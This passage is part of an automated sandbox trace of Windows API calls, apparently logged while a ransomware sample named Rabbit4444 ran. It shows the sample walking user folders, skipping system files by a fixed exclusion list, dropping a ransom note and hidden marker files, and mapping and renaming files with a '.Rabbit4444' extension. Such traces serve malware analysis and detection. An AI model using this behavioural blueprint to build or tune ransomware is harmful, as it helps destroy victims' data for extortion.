ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.250] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.250] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.250] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0cd9c1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0cd9c1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d00340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.250] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.251] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.251] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.251] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.252] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.252] CloseHandle (hObject=0x27c) returned 1 [0066.252] CloseHandle (hObject=0x228) returned 1 [0066.252] GetCurrentThreadId () returned 0xd98 [0066.252] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0066.252] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData" [0066.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0066.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0066.252] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData" [0066.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\" [0066.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0066.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.254] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.256] FlushFileBuffers (hFile=0x228) returned 1 [0066.257] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.257] CloseHandle (hObject=0x228) returned 1 [0066.258] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData") returned 101 [0066.258] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.258] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734de9c3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x734de9c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0d00340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0066.258] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.258] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.258] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.258] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.258] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734de9c3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x734de9c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0d00340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.258] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.258] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.258] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.258] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.258] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.258] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d00340, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d00340, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d00340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.259] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.259] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.259] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d00340, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d00340, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d00340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.259] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0066.259] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.259] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.259] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.260] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.260] CloseHandle (hObject=0x27c) returned 1 [0066.260] CloseHandle (hObject=0x228) returned 1 [0066.260] GetCurrentThreadId () returned 0xd98 [0066.260] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0066.260] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings" [0066.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116790 | out: hHeap=0xe0000) returned 1 [0066.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0066.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings" [0066.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\" [0066.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0066.260] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.264] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.266] FlushFileBuffers (hFile=0x228) returned 1 [0066.267] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.267] CloseHandle (hObject=0x228) returned 1 [0066.267] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings") returned 96 [0066.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.267] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0d260c8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0066.268] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.268] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.268] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.268] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0d260c8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.268] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.268] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.268] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.268] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.268] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0d260c8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0d260c8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d260c8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.268] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.268] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8255f469, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x8255f469, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0066.268] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0066.268] lstrcpyW (in: lpString1=0x130ebfa, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0066.268] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0066.269] lstrlenW (lpString="roaming.lock") returned 12 [0066.269] lstrlenW (lpString="Rabbit4444") returned 10 [0066.269] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0066.269] lstrlenW (lpString=".dll") returned 4 [0066.269] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0066.269] lstrlenW (lpString=".lnk") returned 4 [0066.269] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0066.269] lstrlenW (lpString=".ini") returned 4 [0066.269] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0066.269] lstrlenW (lpString=".sys") returned 4 [0066.269] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0066.269] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x734de9c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd95a74d6, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0066.269] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.269] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.269] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0066.270] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0066.270] lstrcpyW (in: lpString1=0x130ebfa, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0066.270] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0066.270] lstrlenW (lpString="settings.dat") returned 12 [0066.270] lstrlenW (lpString="Rabbit4444") returned 10 [0066.270] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0066.270] lstrlenW (lpString=".dll") returned 4 [0066.270] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0066.270] lstrlenW (lpString=".lnk") returned 4 [0066.270] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0066.270] lstrlenW (lpString=".ini") returned 4 [0066.270] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0066.270] lstrlenW (lpString=".sys") returned 4 [0066.270] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0066.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.271] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0066.271] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15758139725) returned 1 [0066.271] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0066.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0066.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0066.271] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0066.272] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0066.275] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0066.275] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0066.275] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0066.275] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0066.275] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0066.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0066.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0066.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0066.276] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15758692404) returned 1 [0066.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0066.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0066.276] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.276] CloseHandle (hObject=0x260) returned 1 [0066.276] CloseHandle (hObject=0x27c) returned 1 [0066.277] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 120 [0066.277] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0066.281] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd9108aa5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd9108aa5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd9108aa5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0066.281] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0066.282] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0066.282] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0066.282] lstrcpyW (in: lpString1=0x130ebfa, 